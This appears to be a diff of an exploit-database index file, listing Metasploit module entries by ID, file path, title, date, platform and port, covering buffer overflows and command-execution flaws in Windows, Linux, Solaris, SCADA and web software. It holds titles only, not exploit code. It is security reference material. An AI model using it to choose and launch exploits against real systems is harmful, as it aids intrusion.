-16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server <= 5.0.6 - Buffer Overflow",2010-05-09,metasploit,windows,remote,2380 -16818,platforms/windows/remote/16818.rb,"YPOPS 0.6 - Buffer Overflow",2010-05-09,metasploit,windows,remote,25 -16819,platforms/windows/remote/16819.rb,"SoftiaCom WMailserver 1.0 - Buffer Overflow",2010-05-09,metasploit,windows,remote,25 -16820,platforms/windows/remote/16820.rb,"Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)",2010-11-11,metasploit,windows,remote,25 -16821,platforms/windows/remote/16821.rb,"Mercury Mail SMTP AUTH CRAM-MD5 - Buffer Overflow",2010-06-22,metasploit,windows,remote,25 -16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow",2010-04-30,metasploit,windows,remote,25 -16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 LDAP Buffer Overflow",2010-11-14,metasploit,windows,remote,389 -16824,platforms/windows/remote/16824.rb,"IMail LDAP Service Buffer Overflow",2010-04-30,metasploit,windows,remote,389 -16825,platforms/windows/remote/16825.rb,"CA CAM log_security() Stack Buffer Overflow (Win32)",2010-09-20,metasploit,windows,remote,0 -16826,platforms/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service Buffer Overflow",2010-05-13,metasploit,windows,remote,38292 -16827,platforms/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16828,platforms/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16829,platforms/windows/remote/16829.rb,"Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16830,platforms/windows/remote/16830.rb,"Symantec Remote Management Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16831,platforms/windows/remote/16831.rb,"SafeNet SoftRemote IKE Service Buffer Overflow",2010-06-22,metasploit,windows,remote,62514 -16832,platforms/netware/remote/16832.rb,"Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow",2010-05-09,metasploit,netware,remote,0 -16833,platforms/netware/remote/16833.rb,"NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow",2010-11-14,metasploit,netware,remote,111 -16834,platforms/linux/remote/16834.rb,"Snort Back Orifice - Pre-Preprocessor Remote Exploit",2010-07-03,metasploit,linux,remote,0 -16835,platforms/linux/remote/16835.rb,"Madwifi SIOCGIWSCAN Buffer Overflow",2010-09-20,metasploit,linux,remote,0 -16836,platforms/linux/remote/16836.rb,"Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow",2010-04-30,metasploit,linux,remote,0 -16837,platforms/linux/remote/16837.rb,"hplip hpssd.py From Address Arbitrary Command Execution",2010-10-09,metasploit,linux,remote,0 -16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (2)",2011-03-03,metasploit,linux,remote,0 -16839,platforms/linux/remote/16839.rb,"Borland InterBase PWD_db_aliased() Buffer Overflow",2010-07-03,metasploit,linux,remote,0 -16840,platforms/linux/remote/16840.rb,"Borland InterBase open_marker_file() Buffer Overflow",2010-07-03,metasploit,linux,remote,0 -16841,platforms/linux/remote/16841.rb,"GLD (Greylisting Daemon) Postfix Buffer Overflow",2010-07-03,metasploit,linux,remote,0 -16842,platforms/linux/remote/16842.rb,"LPRng - use_syslog Remote Format String",2010-07-03,metasploit,linux,remote,0 -16843,platforms/linux/remote/16843.rb,"Borland InterBase jrd8_create_database() Buffer Overflow",2010-07-03,metasploit,linux,remote,0 -16844,platforms/linux/remote/16844.rb,"Borland InterBase INET_connect() Buffer Overflow",2010-07-03,metasploit,linux,remote,0 -16845,platforms/linux/remote/16845.rb,"Poptop - Negative Read Overflow",2010-11-23,metasploit,linux,remote,0 -16846,platforms/linux/remote/16846.rb,"UoW IMAP server LSUB Buffer Overflow",2010-03-26,metasploit,linux,remote,0 -16847,platforms/linux/remote/16847.rb,"Squid NTLM Authenticate Overflow",2010-04-30,metasploit,linux,remote,0 -16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 - 'secure' Overflow (Linux)",2010-09-20,metasploit,linux,remote,0 -16849,platforms/linux/remote/16849.rb,"MySQL yaSSL - SSL Hello Message Buffer Overflow (Linux)",2010-05-09,metasploit,linux,remote,0 -16850,platforms/linux/remote/16850.rb,"MySQL yaSSL CertDecoder::GetName Buffer Overflow",2010-04-30,metasploit,linux,remote,0 -16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 < 1.3.3b - Telnet IAC Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0 -16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0 -16853,platforms/linux/remote/16853.rb,"Berlios GPSD Format String",2010-04-30,metasploit,linux,remote,0 -16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point apply.cgi Buffer Overflow",2010-09-24,metasploit,hardware,remote,0 -16855,platforms/linux/remote/16855.rb,"PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)",2010-09-20,metasploit,linux,remote,0 -16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTP Daemon Arbitrary Command Execution",2010-07-07,metasploit,cgi,webapps,0 -16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",2010-10-05,metasploit,cgi,webapps,0 -16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package passwd.php3 - Arbitrary Command Execution",2010-10-18,metasploit,php,webapps,0 -16859,platforms/linux/remote/16859.rb,"Samba lsa_io_trans_names Heap Overflow (Linux)",2010-07-14,metasploit,linux,remote,0 -16860,platforms/linux/remote/16860.rb,"Samba chain_reply Memory Corruption (Linux x86)",2010-09-04,metasploit,linux,remote,0 -16861,platforms/linux/remote/16861.rb,"Samba - trans2open Overflow (Linux x86)",2010-07-14,metasploit,linux,remote,0 -16862,platforms/hardware/remote/16862.rb,"iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)",2010-09-20,metasploit,hardware,remote,0 -16863,platforms/osx/remote/16863.rb,"AppleFileServer LoginExt PathName Overflow",2010-09-20,metasploit,osx,remote,0 -16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client - Buffer Overflow Exploit (OSX)",2010-10-09,metasploit,osx,remote,0 -16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 - Overflow (Mac OS X)",2010-05-09,metasploit,osx,remote,0 -16866,platforms/unix/remote/16866.rb,"Safari Archive Metadata Command Execution",2010-09-20,metasploit,unix,remote,0 -16867,platforms/osx/remote/16867.rb,"Apple OS X Software Update Command Execution",2010-09-20,metasploit,osx,remote,0 -16868,platforms/hardware/remote/16868.rb,"iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)",2010-09-20,metasploit,hardware,remote,0 -16869,platforms/hardware/remote/16869.rb,"iPhone MobileMail LibTIFF Buffer Overflow",2010-09-20,metasploit,hardware,remote,0 -16870,platforms/multiple/remote/16870.rb,"Mail.app Image Attachment Command Execution",2011-03-05,metasploit,multiple,remote,0 -16871,platforms/osx/remote/16871.rb,"Mac OS X mDNSResponder UPnP Location Overflow",2011-01-08,metasploit,osx,remote,0 -16872,platforms/osx/remote/16872.rb,"WebSTAR FTP Server USER Overflow",2010-09-20,metasploit,osx,remote,0 -16873,platforms/osx/remote/16873.rb,"MacOS X QuickTime RTSP Content-Type Overflow",2010-10-09,metasploit,osx,remote,0 -16874,platforms/osx/remote/16874.rb,"MacOS X EvoCam HTTP GET Buffer Overflow",2010-10-09,metasploit,osx,remote,0 -16875,platforms/osx/remote/16875.rb,"Samba lsa_io_trans_names Heap Overflow (OSX)",2010-04-05,metasploit,osx,remote,0 -16876,platforms/osx_ppc/remote/16876.rb,"Samba - trans2open Overflow (Mac OS X PPC)",2010-06-21,metasploit,osx_ppc,remote,0 -16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter Command Execution",2010-10-06,metasploit,irix,remote,0 -16878,platforms/linux/remote/16878.rb,"ProFTPD 1.3.2rc3 < 1.3.3b - Telnet IAC Buffer Overflow (FreeBSD)",2010-12-02,metasploit,linux,remote,0 -16879,platforms/freebsd/remote/16879.rb,"XTACACSD <= 4.1.2 report() Buffer Overflow",2010-05-09,metasploit,freebsd,remote,0 -16880,platforms/linux/remote/16880.rb,"Samba trans2open - Overflow (*BSD x86)",2010-06-17,metasploit,linux,remote,0 -16881,platforms/php/webapps/16881.rb,"Cacti graph_view.php Remote Command Execution",2010-07-03,metasploit,php,webapps,0 -16882,platforms/php/webapps/16882.rb,"PHP XML-RPC Arbitrary Code Execution",2010-07-25,metasploit,php,webapps,0 -16883,platforms/php/webapps/16883.rb,"Simple PHP Blog <= 0.4.0 - Remote Command Execution",2010-07-25,metasploit,php,webapps,0 -16885,platforms/php/webapps/16885.rb,"TikiWiki jhot Remote Command Execution",2010-07-25,metasploit,php,webapps,0 -16886,platforms/cgi/webapps/16886.rb,"AWStats (6.4-6.5) migrate Remote Command Execution",2010-07-03,metasploit,cgi,webapps,0 -16887,platforms/linux/remote/16887.rb,"HP Openview connectedNodes.ovpl Remote Command Execution",2010-07-03,metasploit,linux,remote,0 -16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin command execution (SMTP)",2010-08-25,metasploit,linux,remote,0 -16889,platforms/linux/webapps/16889.rb,"Redmine SCM Repository 0.9.x / 1.0.x - Arbitrary Command Execution",2011-01-08,metasploit,linux,webapps,0 -16890,platforms/php/webapps/16890.rb,"phpBB viewtopic.php Arbitrary Code Execution",2010-07-03,metasploit,php,webapps,0 -16891,platforms/cgi/webapps/16891.rb,"QuickTime Streaming Server parse_xml.cgi Remote Execution",2010-07-03,metasploit,cgi,webapps,0 -16892,platforms/php/webapps/16892.rb,"TWiki History TWikiUsers rev Parameter Command Execution",2010-07-03,metasploit,php,webapps,0 -16893,platforms/cgi/webapps/16893.rb,"Barracuda IMG.PL Remote Command Execution",2010-04-30,metasploit,cgi,webapps,0 -16894,platforms/php/webapps/16894.rb,"TWiki Search Function Arbitrary Command Execution",2010-07-03,metasploit,php,webapps,0 -16895,platforms/php/webapps/16895.rb,"WordPress cache_lastpostdate - Arbitrary Code Execution",2010-07-03,metasploit,php,webapps,0 -16896,platforms/php/webapps/16896.rb,"vBulletin misc.php Template Name Arbitrary Code Execution",2010-07-25,metasploit,php,webapps,0 -16897,platforms/php/webapps/16897.rb,"BASE - base_qry_common Remote File Include",2010-11-24,metasploit,php,webapps,0 -16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,metasploit,php,webapps,0 -16901,platforms/php/webapps/16901.rb,"PAJAX Remote Command Execution",2010-04-30,metasploit,php,webapps,0 -16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit",2011-01-14,metasploit,php,webapps,0 -16903,platforms/php/remote/16903.rb,"OpenX banner-edit.php File Upload PHP Code Execution",2010-09-20,metasploit,php,remote,0 -16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,metasploit,php,webapps,0 -16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) - configdir Remote Command Execution",2009-12-26,metasploit,cgi,webapps,0 -16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 TinyBrowser File Upload Code Execution",2010-06-15,metasploit,php,webapps,0 -16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet Command Execution",2010-07-01,metasploit,hardware,webapps,0 -16908,platforms/cgi/webapps/16908.rb,"Nagios3 statuswml.cgi Ping Command Execution",2010-07-14,metasploit,cgi,webapps,0 -16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution",2010-07-03,metasploit,php,webapps,0 -16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection",2011-01-08,metasploit,linux,remote,0 -16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula Remote PHP Code Execution",2010-09-20,metasploit,php,webapps,0 -16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class mosConfig_absolute_path Remote File Include",2010-11-24,metasploit,php,webapps,0 -16913,platforms/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection",2010-07-03,metasploit,php,webapps,0 -16914,platforms/cgi/webapps/16914.rb,"Matt Wright guestbook.pl Arbitrary Command Execution",2010-07-03,metasploit,cgi,webapps,0 -16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent Command Injection",2010-10-25,metasploit,linux,remote,0 -16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution",2011-03-03,metasploit,linux,remote,0 -16917,platforms/php/webapps/16917.rb,"Dogfood CRM spell.php Remote Command Execution",2010-07-03,metasploit,php,webapps,0 -16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent net.tcp.listen Command Injection",2010-07-03,metasploit,freebsd,remote,0 -16919,platforms/linux/remote/16919.rb,"DistCC Daemon Command Execution",2010-07-03,metasploit,linux,remote,0 -16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd Remote Command Execution",2010-04-30,metasploit,linux,remote,0 -16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c - Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0 -16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 - Backdoor Command Execution",2010-12-05,metasploit,linux,remote,0 -16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web Remote Command Execution",2010-10-09,metasploit,hardware,webapps,0 -16924,platforms/linux/remote/16924.rb,"ClamAV Milter Blackhole-Mode Remote Code Execution",2010-10-09,metasploit,linux,remote,0 -16925,platforms/linux/remote/16925.rb,"Exim4 <= 4.69 - string_format Function Heap Buffer Overflow",2010-12-16,metasploit,linux,remote,0 -16926,platforms/windows/remote/16926.rb,"Mercantec SoftCart CGI Overflow",2010-09-20,metasploit,windows,remote,0 -16927,platforms/hp-ux/remote/16927.rb,"HP-UX LPD Command Execution",2010-10-06,metasploit,hp-ux,remote,0 -16928,platforms/linux/remote/16928.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow",2010-07-03,metasploit,linux,remote,0 -16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow",2010-11-11,metasploit,aix,dos,0 -16930,platforms/aix/remote/16930.rb,"ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",2010-11-11,metasploit,aix,remote,0 +16284,platforms/unix/dos/16284.rb,"Subversion Date Svnserve",2010-08-07,Metasploit,unix,dos,0 +16285,platforms/linux/remote/16285.rb,"NTP daemon readvar Buffer Overflow",2010-08-25,Metasploit,linux,remote,0 +16286,platforms/multiple/remote/16286.rb,"RealServer Describe Buffer Overflow",2010-08-07,Metasploit,multiple,remote,0 +16287,platforms/multiple/remote/16287.rb,"Wyse Rapport Hagent Fake Hserver Command Execution",2010-11-11,Metasploit,multiple,remote,0 +16288,platforms/multiple/remote/16288.rb,"Generic Payload Handler",2011-02-28,Metasploit,multiple,remote,0 +16289,platforms/linux/remote/16289.rb,"Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow",2010-02-11,Metasploit,linux,remote,0 +16290,platforms/multiple/remote/16290.rb,"VERITAS NetBackup Remote Command Execution",2010-10-09,Metasploit,multiple,remote,0 +16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II Command Execution",2010-09-20,Metasploit,multiple,remote,0 +16292,platforms/multiple/remote/16292.rb,"Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)",2010-11-24,Metasploit,multiple,remote,0 +16293,platforms/multiple/remote/16293.rb,"Sun Java Calendar Deserialization Exploit",2010-09-20,Metasploit,multiple,remote,0 +16294,platforms/multiple/remote/16294.rb,"Sun Java JRE getSoundbank file:// URI Buffer Overflow",2010-09-20,Metasploit,multiple,remote,0 +16295,platforms/multiple/remote/16295.rb,"Apple QTJava toQTPointer() Arbitrary Memory Access",2010-09-20,Metasploit,multiple,remote,0 +16296,platforms/osx/remote/16296.rb,"Apple OS X iTunes 8.1.1 ITms Overflow",2010-11-11,Metasploit,osx,remote,0 +16297,platforms/multiple/remote/16297.rb,"Java Statement.invoke() Trusted Method Chain Exploit",2010-12-15,Metasploit,multiple,remote,0 +16298,platforms/multiple/remote/16298.rb,"Sun Java JRE AWT setDiffICM Buffer Overflow",2010-09-20,Metasploit,multiple,remote,0 +16299,platforms/multiple/remote/16299.rb,"Firefox 3.5 - escape() Return Value Memory Corruption",2010-09-20,Metasploit,multiple,remote,0 +16300,platforms/multiple/remote/16300.rb,"Mozilla Suite/Firefox Navigator Object Code Execution",2010-09-20,Metasploit,multiple,remote,0 +16301,platforms/multiple/remote/16301.rb,"Firefox location.QueryInterface() Code Execution",2010-09-20,Metasploit,multiple,remote,0 +16302,platforms/multiple/remote/16302.rb,"Signed Applet Social Engineering - Code Execuction",2011-01-08,Metasploit,multiple,remote,0 +16303,platforms/multiple/remote/16303.rb,"Opera 9 Configuration Overwrite",2010-07-27,Metasploit,multiple,remote,0 +16304,platforms/multiple/remote/16304.rb,"Opera historysearch XSS",2010-11-11,Metasploit,multiple,remote,0 +16305,platforms/multiple/remote/16305.rb,"Java RMIConnectionImpl Deserialization Privilege Escalation Exploit",2010-09-27,Metasploit,multiple,remote,0 +16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution",2010-09-20,Metasploit,windows,remote,0 +16307,platforms/multiple/local/16307.rb,"PeaZip <= 2.6.1 Zip Processing Command Injection",2010-09-20,Metasploit,multiple,local,0 +16308,platforms/multiple/remote/16308.rb,"Maple Maplet File Creation and Command Execution",2010-09-20,Metasploit,multiple,remote,0 +16309,platforms/multiple/remote/16309.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun (1)",2010-09-20,Metasploit,multiple,remote,0 +16310,platforms/multiple/remote/16310.rb,"PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,Metasploit,multiple,remote,0 +16311,platforms/linux/remote/16311.rb,"wu-ftpd - SITE EXEC/INDEX Format String",2010-11-30,Metasploit,linux,remote,0 +16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,Metasploit,multiple,remote,0 +16313,platforms/php/webapps/16313.rb,"FreeNAS exec_raw.php Arbitrary Command Execution",2010-11-24,Metasploit,php,webapps,0 +16314,platforms/multiple/remote/16314.rb,"Sun Java System Web Server WebDAV OPTIONS Buffer Overflow",2010-08-07,Metasploit,multiple,remote,0 +16315,platforms/multiple/remote/16315.rb,"Axis2 - / SAP BusinessObjects Authenticated Code Execution (via SOAP)",2010-12-14,Metasploit,multiple,remote,0 +16316,platforms/multiple/remote/16316.rb,"JBoss Java Class DeploymentFileRepository WAR deployment",2010-08-03,Metasploit,multiple,remote,0 +16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager Application Deployer Authenticated Code Execution",2010-12-14,Metasploit,multiple,remote,0 +16318,platforms/multiple/remote/16318.rb,"JBoss JMX Console Deployer Upload and Execute",2010-10-19,Metasploit,multiple,remote,0 +16319,platforms/multiple/remote/16319.rb,"JBoss JMX Console Beanshell Deployer WAR upload and deployment",2011-01-10,Metasploit,multiple,remote,0 +16320,platforms/unix/remote/16320.rb,"Samba 'username map script' Command Execution",2010-08-18,Metasploit,unix,remote,0 +16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow",2010-04-28,Metasploit,linux,remote,0 +16322,platforms/solaris/remote/16322.rb,"Solaris LPD Command Execution",2010-09-20,Metasploit,solaris,remote,0 +16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd Heap Overflow",2010-04-30,Metasploit,solaris_sparc,remote,0 +16324,platforms/multiple/remote/16324.rb,"Solaris sadmind Command Execution",2010-06-22,Metasploit,multiple,remote,0 +16325,platforms/solaris/remote/16325.rb,"Sun Solaris sadmind adm_build_path() Buffer Overflow",2010-07-03,Metasploit,solaris,remote,0 +16326,platforms/solaris/remote/16326.rb,"Solaris ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0 +16327,platforms/solaris/remote/16327.rb,"Solaris in.telnetd TTYPROMPT Buffer Overflow",2010-06-22,Metasploit,solaris,remote,0 +16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet Remote Authentication Bypass",2010-06-22,Metasploit,solaris,remote,0 +16329,platforms/solaris/remote/16329.rb,"Samba lsa_io_trans_names Heap Overflow (Solaris)",2010-04-05,Metasploit,solaris,remote,0 +16330,platforms/solaris_sparc/remote/16330.rb,"Samba - trans2open Overflow (Solaris SPARC)",2010-06-21,Metasploit,solaris_sparc,remote,0 +16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service Overflow",2010-06-22,Metasploit,windows,remote,0 +16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows Remote Agent Overflow",2010-07-03,Metasploit,windows,remote,0 +16333,platforms/windows/remote/16333.rb,"Windows Media Services ConnectFunnel Stack Buffer Overflow",2010-04-28,Metasploit,windows,remote,0 +16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow",2010-09-20,Metasploit,windows,remote,0 +16335,platforms/windows/remote/16335.rb,"WinComLPD <= 3.0.2 - Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 +16336,platforms/windows/remote/16336.rb,"NIPrint LPD Request Overflow",2010-12-25,Metasploit,windows,remote,0 +16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 LPD Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16339,platforms/windows/remote/16339.rb,"Timbuktu Pro Directory Traversal/File Upload",2010-11-24,Metasploit,windows,remote,0 +16340,platforms/windows/remote/16340.rb,"Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 +16341,platforms/windows/remote/16341.rb,"Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 +16342,platforms/windows/remote/16342.rb,"Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 +16343,platforms/windows/remote/16343.rb,"Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16344,platforms/windows/remote/16344.rb,"FutureSoft TFTP Server 2000 - Transfer-Mode Overflow",2010-05-09,Metasploit,windows,remote,0 +16345,platforms/windows/remote/16345.rb,"D-Link TFTP 1.0 - Long Filename Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16346,platforms/windows/remote/16346.rb,"TFTPDWIN 0.4.2 - Long Filename Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP - Long Mode Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 Transfer-Mode Overflow",2010-06-15,Metasploit,windows,remote,0 +16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21 - Long Filename Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 - Long Filename Overflow",2011-03-05,Metasploit,windows,remote,0 +16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",2010-06-15,Metasploit,windows,remote,0 +16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16353,platforms/windows/remote/16353.rb,"AIM Triton 1.0.4 CSeq Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16354,platforms/windows/remote/16354.rb,"Microsoft IIS ISAPI w3who.dll Query String Overflow",2010-07-07,Metasploit,windows,remote,0 +16355,platforms/windows/remote/16355.rb,"Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow",2010-07-25,Metasploit,windows,remote,0 +16356,platforms/windows/remote/16356.rb,"Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow",2010-07-25,Metasploit,windows,remote,0 +16357,platforms/windows/remote/16357.rb,"Microsoft IIS Phone Book Service Overflow",2010-04-30,Metasploit,windows,remote,0 +16358,platforms/windows/remote/16358.rb,"Microsoft IIS ISAPI RSA WebAgent Redirect Overflow",2010-09-20,Metasploit,windows,remote,0 +16359,platforms/windows/remote/16359.rb,"Microsoft WINS Service Memory Overwrite",2010-09-20,Metasploit,windows,remote,0 +16360,platforms/windows/remote/16360.rb,"Microsoft Windows SMB Relay Code Execution",2010-09-21,Metasploit,windows,remote,0 +16361,platforms/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061)",2011-02-17,Metasploit,windows,remote,0 +16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,Metasploit,windows,remote,0 +16363,platforms/windows/remote/16363.rb,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,Metasploit,windows,remote,0 +16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service Overflow",2010-05-09,Metasploit,windows,remote,0 +16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service Overflow",2010-08-30,Metasploit,windows,dos,0 +16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)",2010-09-28,Metasploit,windows,remote,0 +16367,platforms/windows/remote/16367.rb,"Microsoft Server Service NetpwPathCanonicalize Overflow",2011-02-17,Metasploit,windows,remote,0 +16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow",2010-07-03,Metasploit,windows,remote,0 +16369,platforms/windows/remote/16369.rb,"Microsoft Services - nwwks.dll (MS06-066)",2010-05-09,Metasploit,windows,remote,0 +16370,platforms/windows/remote/16370.rb,"Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service Overflow",2010-07-03,Metasploit,windows,remote,0 +16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service NetpManageIPCConnect Overflow",2010-10-05,Metasploit,windows,remote,0 +16373,platforms/windows/remote/16373.rb,"Microsoft Services - nwapi32.dll (MS06-066)",2010-08-25,Metasploit,windows,remote,0 +16374,platforms/windows/remote/16374.rb,"Microsoft Windows Authenticated User Code Execution",2010-12-02,Metasploit,windows,remote,0 +16375,platforms/windows/remote/16375.rb,"Microsoft RRAS Service RASMAN Registry Overflow",2010-08-25,Metasploit,windows,remote,0 +16376,platforms/windows/remote/16376.rb,"Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 +16377,platforms/windows/remote/16377.rb,"Microsoft ASN.1 Library Bitstring Heap Overflow",2010-07-25,Metasploit,windows,remote,0 +16378,platforms/windows/remote/16378.rb,"Microsoft Workstation Service NetAddAlternateComputerName Overflow",2010-05-09,Metasploit,windows,remote,0 +16379,platforms/windows/remote/16379.rb,"Microsoft Outlook Express NNTP Response Parsing Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16380,platforms/windows/remote/16380.rb,"CitectSCADA/CitectFacilities ODBC Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 +16381,platforms/windows/remote/16381.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 +16382,platforms/windows/remote/16382.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow",2010-11-30,Metasploit,windows,remote,0 +16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow",2010-11-30,Metasploit,windows,remote,0 +16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 +16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 Wireless Driver Beacon Rates Overflow",2010-07-03,Metasploit,windows,remote,0 +16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver Probe Response SSID Overflow",2010-07-03,Metasploit,hardware,remote,0 +16388,platforms/hardware/remote/16388.rb,"NetGear WG111v2 Wireless Driver - Long Beacon Overflow",2010-07-03,Metasploit,hardware,remote,0 +16389,platforms/windows/remote/16389.rb,"Omni-NFS Server Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16390,platforms/windows/remote/16390.rb,"Energizer DUO Trojan Code Execution",2010-09-20,Metasploit,windows,remote,0 +16391,platforms/windows/remote/16391.rb,"EMC AlphaStor Agent Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16392,platforms/windows/remote/16392.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption",2011-01-24,Metasploit,windows,remote,0 